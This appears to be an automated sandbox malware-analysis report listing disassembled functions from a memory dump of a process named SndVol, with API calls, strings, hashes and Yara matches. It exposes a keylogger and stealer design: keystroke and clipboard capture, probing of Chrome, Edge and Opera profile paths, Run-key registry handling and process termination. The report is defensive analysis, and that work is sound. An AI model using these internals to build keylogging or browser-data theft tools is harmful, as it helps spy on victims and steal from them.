                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,29181E12,?,00000050,?,?,?,?,?), ref: 29181C92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 0-711371036
                                                                        • Opcode ID: 883fed9478ecba482d0269ca059c7cbed381970bc5bf02c865a89724fbcc5cd6
                                                                        • Instruction ID: 72a4a0bd93e7b3b82756e5d5afbf3c9e92d30b63374d7a6c69b02f3bc0d136c2
                                                                        • Opcode Fuzzy Hash: 883fed9478ecba482d0269ca059c7cbed381970bc5bf02c865a89724fbcc5cd6
                                                                        • Instruction Fuzzy Hash: 5721B563E0020466F3188A57C9CABD77366BF54B5DF428455D919D7104E732DB43DB50
                                                                        Function 2913B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29164801: __onexit.LIBCMT ref: 29164807
                                                                        • __Init_thread_footer.LIBCMT ref: 2913B7D2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                        • API String ID: 1881088180-3686566968
                                                                        • Opcode ID: 7657fcb1e0baf5160cf534cd9c8645a3709b09380def265843db4d966c3cfb44
                                                                        • Instruction ID: c3003a58f9b9d58f0cdc2d6a3ad393492a412e828aebb9b7fd84050fe718584e
                                                                        • Opcode Fuzzy Hash: 7657fcb1e0baf5160cf534cd9c8645a3709b09380def265843db4d966c3cfb44
                                                                        • Instruction Fuzzy Hash: 1021C331910108AADB48FBB7DC919FDB779AF60158F909029D00667194FF306F4BCA98
                                                                        Function 0443703C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 0443704D
                                                                          • Part of subcall function 0442AB3C: _wcslen.LIBCMT ref: 0442AB55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen
                                                                        • String ID: !D@$PG
                                                                        • API String ID: 176396367-1987221222
                                                                        • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                                        • Instruction ID: 3d4cb0eda9c498db01393b725b557ecc4922dd5edf8feeebcd42e299d9ab2e6f
                                                                        • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                                        • Instruction Fuzzy Hash: AE110521B4421117FF197F3399606BE2686FF94319FC0846FE58A8F2D2EDD47C415255
                                                                        Function 04425324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: o~E$NG
                                                                        • API String ID: 3519838083-4065726910
                                                                        • Opcode ID: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                        • Instruction ID: dfa1472083a6622b4a3b48fb5574b34121d2f08cff703f49eb6fec06c5a9c0e2
                                                                        • Opcode Fuzzy Hash: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                        • Instruction Fuzzy Hash: B821E232D000189BEF14FBA6EA41AFEB775FF54314F60416FA526A3191EF742E068B84
                                                                        Function 29134FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?,291A5598,?,00000000,?,?,?,?,?,?,29145D04,?,00000001,0000004C,00000000), ref: 29135030
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • GetLocalTime.KERNEL32(?,291A5598,?,00000000,?,?,?,?,?,?,29145D04,?,00000001,0000004C,00000000), ref: 29135087
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 2913501F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                        • API String ID: 481472006-1507639952
                                                                        • Opcode ID: a74244e252d947c2421704914507534953a508ba4cce2591d536e556fe823d14
                                                                        • Instruction ID: cda50d4b2436f9fc7183c6b59af17ea09de7156e2eccb18c0ab2007a98f19eca
                                                                        • Opcode Fuzzy Hash: a74244e252d947c2421704914507534953a508ba4cce2591d536e556fe823d14
                                                                        • Instruction Fuzzy Hash: 0C214661E043C47FE704B733D8487AE7BB9AB6220CFC0551CD4490715ADA3A5B4AC7E6
                                                                        Function 2914B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                        • API String ID: 481472006-2430845779
                                                                        • Opcode ID: ab85591ef15120167ddf0fe3f73f40d22ceea42dfdf0c4b8fc6ffca387b07543
                                                                        • Instruction ID: c8081d60a90ac12fc5c425cd6ed58e178009a38e188e94ac5c4d2b21095120b1
                                                                        • Opcode Fuzzy Hash: ab85591ef15120167ddf0fe3f73f40d22ceea42dfdf0c4b8fc6ffca387b07543
                                                                        • Instruction Fuzzy Hash: BA1151715182446AD344EB63DC508FEB7FCAF64208FD0591DF499821E4EF38EB4AC65A
                                                                        Function 2913B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2913B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                          • Part of subcall function 2913B19F: wsprintfW.USER32 ref: 2913B22E
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • CloseHandle.KERNEL32(?), ref: 2913B0EF
                                                                        • UnhookWindowsHookEx.USER32 ref: 2913B102
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                        • String ID: Online Keylogger Stopped
                                                                        • API String ID: 1623830855-1496645233
                                                                        • Opcode ID: 198b96e2550d4414c5291f34ace0c7e98a9da5f4c876bfecf39b6cb23d88b210
                                                                        • Instruction ID: 0a60f42363c33172cfe3a5dfa3e3ebe3f405f08fd51fa4537cce68b72cd786ed
                                                                        • Opcode Fuzzy Hash: 198b96e2550d4414c5291f34ace0c7e98a9da5f4c876bfecf39b6cb23d88b210
                                                                        • Instruction Fuzzy Hash: 65012434B002407BE7257B36DC0A7BEBBB19F52218FC0145DC84202195FB612B5BC7DA
                                                                        Function 04464549 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: $G
                                                                        • API String ID: 269201875-4251033865
                                                                        • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                                        • Instruction ID: 483ea3cb8e69554956f25a4eebe374b55c73d2bea4a71fdca42660505d2a7063
                                                                        • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                                        • Instruction Fuzzy Hash: C3E0E522A0655001FFB1663F7D0466B01478BC12BEB00032BE62B876C0DF607542946B
                                                                        Function 2913C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 2913C594
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                        • API String ID: 1174141254-2800177040
                                                                        • Opcode ID: 4a39a5281aecd0c1eedec495c3444bac523214345d7f3a3b2c90ad756ed398a4
                                                                        • Instruction ID: ddc7238f23babb5d5dcba90219bbaeb5104d1acd1085bcffbfe25b905a958e8d
                                                                        • Opcode Fuzzy Hash: 4a39a5281aecd0c1eedec495c3444bac523214345d7f3a3b2c90ad756ed398a4
                                                                        • Instruction Fuzzy Hash: 63F0E231A04209B6DB04FAF7DC468EE7F3C9F20299BC01026AA06520C4EE14AB4782E8
                                                                        Function 2913C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 2913C5F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                        • API String ID: 1174141254-1629609700
                                                                        • Opcode ID: a5a46b2b1b0686a9fa908cf3489378ba9bff2946627dfbfa3e5b3793ce9f85b4
                                                                        • Instruction ID: 477d6979cad541b3e539f9fc302a896587839e21af1fdc239ceecfa79951789d
                                                                        • Opcode Fuzzy Hash: a5a46b2b1b0686a9fa908cf3489378ba9bff2946627dfbfa3e5b3793ce9f85b4
                                                                        • Instruction Fuzzy Hash: EDF0E931904219B69B04E6F7CC468EE7B3C9F30199FC09015A90652184EE14AB47C2E8
                                                                        Function 2913C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 2913C531
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                        • API String ID: 1174141254-4188645398
                                                                        • Opcode ID: 93600cf66746ab31a58999ed0b5d875cac6bb13c6cb62948a6f922efbad2a609
                                                                        • Instruction ID: 1693471093a531e77e90c2421b6d2186199d511daf04a3465b45ec206a160e68
                                                                        • Opcode Fuzzy Hash: 93600cf66746ab31a58999ed0b5d875cac6bb13c6cb62948a6f922efbad2a609
                                                                        • Instruction Fuzzy Hash: 32F08931A04119B6D754E7F7DC468EE7B3C9F20199BC05125AA0692184EE14EB4782E9
                                                                        Function 044645A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: $G
                                                                        • API String ID: 269201875-4251033865
                                                                        • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                        • Instruction ID: 76dc2f10fedd691a1e2bbf024f172df88e6dbb081550355db428f3040be16e6c
                                                                        • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                        • Instruction Fuzzy Hash: 76E0E522A0641101FE75263A3D0079B06478BC137EF20036BF627871D1EF646582906F
                                                                        Function 2913B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyState.USER32(00000011), ref: 2913B686
                                                                          • Part of subcall function 2913A41B: GetForegroundWindow.USER32(?,?,00000000), ref: 2913A451
                                                                          • Part of subcall function 2913A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 2913A45D
                                                                          • Part of subcall function 2913A41B: GetKeyboardLayout.USER32(00000000), ref: 2913A464
                                                                          • Part of subcall function 2913A41B: GetKeyState.USER32(00000010), ref: 2913A46E
                                                                          • Part of subcall function 2913A41B: GetKeyboardState.USER32(?,?,00000000), ref: 2913A479
                                                                          • Part of subcall function 2913A41B: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 2913A49C
                                                                          • Part of subcall function 2913A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 2913A4FC
                                                                          • Part of subcall function 2913A671: SetEvent.KERNEL32(?,?,00000000,2913B245,00000000), ref: 2913A69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                        • String ID: [AltL]$[AltR]
                                                                        • API String ID: 2738857842-2658077756
                                                                        • Opcode ID: 2ed7027207d82eafa7599d79e3e2ea6d649af79a03b04bfdb0ebcf5aae9b0df6
                                                                        • Instruction ID: 1f96a1da8f1c184f0c1acdc6c484a5ef20a57695a06879ba18292ac1db03e3d1
                                                                        • Opcode Fuzzy Hash: 2ed7027207d82eafa7599d79e3e2ea6d649af79a03b04bfdb0ebcf5aae9b0df6
                                                                        • Instruction Fuzzy Hash: D1E09B61B4015027C989363F5D69AFD3D718F415E8BC2814DE4438B6DAE956CB4343DE
                                                                        Function 2913B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyState.USER32(00000012), ref: 2913B6E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                        • API String ID: 1649606143-2446555240
                                                                        • Opcode ID: 3363624a069bbaf7dd0f2b2cde7c863402560b542455789dd311af099bf20a97
                                                                        • Instruction ID: a3cb96c69afde7c82496a8751a4660234e3229318676eb0a575a60036eebc3e2
                                                                        • Opcode Fuzzy Hash: 3363624a069bbaf7dd0f2b2cde7c863402560b542455789dd311af099bf20a97
                                                                        • Instruction Fuzzy Hash: 97E0CD31B4026027D5583A7F9A1E7BD3932DB426ACFC1011DE4834B5CBE946870353EA
                                                                        Function 29143A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,2913D17F,00000000,291A52D8,291A52F0,?,pth_unenc), ref: 29143A6C
                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 29143A80
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 29143A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                        • API String ID: 2654517830-1051519024
                                                                        • Opcode ID: 8e3383d8448e4b3c28f1c0e2c69a851a3430a27d1347f2e41103fd111b35e46e
                                                                        • Instruction ID: 00f6a72691b426e5a269611b4a6c9eb1197b9623631e6fc5d59878b11daf5473
                                                                        • Opcode Fuzzy Hash: 8e3383d8448e4b3c28f1c0e2c69a851a3430a27d1347f2e41103fd111b35e46e
                                                                        • Instruction Fuzzy Hash: 54E0CD3165420CBBEF015E73DD06FFA7B2CEB01B40F100254B60592041C727CA055660
                                                                        Function 0442F4F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0445551E: __onexit.LIBCMT ref: 04455524
                                                                        • __Init_thread_footer.LIBCMT ref: 04431C81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: ,kG$0kG
                                                                        • API String ID: 1881088180-2015055088
                                                                        • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                        • Instruction ID: f8b2f9951fcfb7a043c5b22946a704dd875667a8043c427dc416fe949ea64ecb
                                                                        • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                        • Instruction Fuzzy Hash: D1E0D835114920AFEE14B72D968095537969B0EB2AB21412BE404D62DACF2674418D5C
                                                                        Function 2913B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 2913B8B1
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 2913B8DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteDirectoryFileRemove
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3325800564-4028850238
                                                                        • Opcode ID: d13528a48e0892d4b7994e437fff5b1e349cc195a1cd8bfd32da02c29d87ccbd
                                                                        • Instruction ID: 71a31854f897fc2259d959daba7de8aebf38da73b00c07946d24ae1b21b9fdab
                                                                        • Opcode Fuzzy Hash: d13528a48e0892d4b7994e437fff5b1e349cc195a1cd8bfd32da02c29d87ccbd
                                                                        • Instruction Fuzzy Hash: DEE0CD315506105BE758BB32CC98BDB33BC7F14119F40551AD493D3110DF24AA4FE754
                                                                        Function 2914288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1872346434-4028850238
                                                                        • Opcode ID: 8a2b4e9457d3bf5d863117506c726c46c74ee2caca16189c447f5fe82d6e1fd2
                                                                        • Instruction ID: 8ce6faf11229e2916bbaa553c6d64d01911b48aedc677bca7d3ffa271fb8ba43
                                                                        • Opcode Fuzzy Hash: 8a2b4e9457d3bf5d863117506c726c46c74ee2caca16189c447f5fe82d6e1fd2
                                                                        • Instruction Fuzzy Hash: 8ED0C93435929AABE7392A62ED48B443E5BA705321F200601B821512EAD72D4854EA10
                                                                        Function 29170CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,29131D55), ref: 29170D77
                                                                        • GetLastError.KERNEL32 ref: 29170D85
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 29170DE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1717984340-0
                                                                        • Opcode ID: e3cf2ef771cde21f6b4f01180ed30c318c5623612f2e7f6b774637bdf65b3409
                                                                        • Instruction ID: 5c9ce253d1c022bf517e2f90e2f5d50a90ca4246be812e84a2affafb1bfff647
                                                                        • Opcode Fuzzy Hash: e3cf2ef771cde21f6b4f01180ed30c318c5623612f2e7f6b774637bdf65b3409
                                                                        • Instruction Fuzzy Hash: 3E41C331A04347AFDB158F66CD44BEE7BB5EF01368F2181A9F9589B2A1DB709B02C750
                                                                        Function 29141B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 29141BC7
                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 29141C93
                                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29141CB5
                                                                        • SetLastError.KERNEL32(0000007E,29141F2B), ref: 29141CCC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastRead
                                                                        • String ID:
                                                                        • API String ID: 4100373531-0
                                                                        • Opcode ID: c27b2709a0a370e49ce6956799f56edf8dec054576f0c4843a4810418487ca73
                                                                        • Instruction ID: 7f0c7e5707cc56b13cae8f4d199ab9e9f54d202a0607a30873a725f4a4cda14a
                                                                        • Opcode Fuzzy Hash: c27b2709a0a370e49ce6956799f56edf8dec054576f0c4843a4810418487ca73
                                                                        • Instruction Fuzzy Hash: 1441CE71A443059FE7148F16DCC4BA6B3E8FF58718F00182DEA6AE7651EB31EA06CB11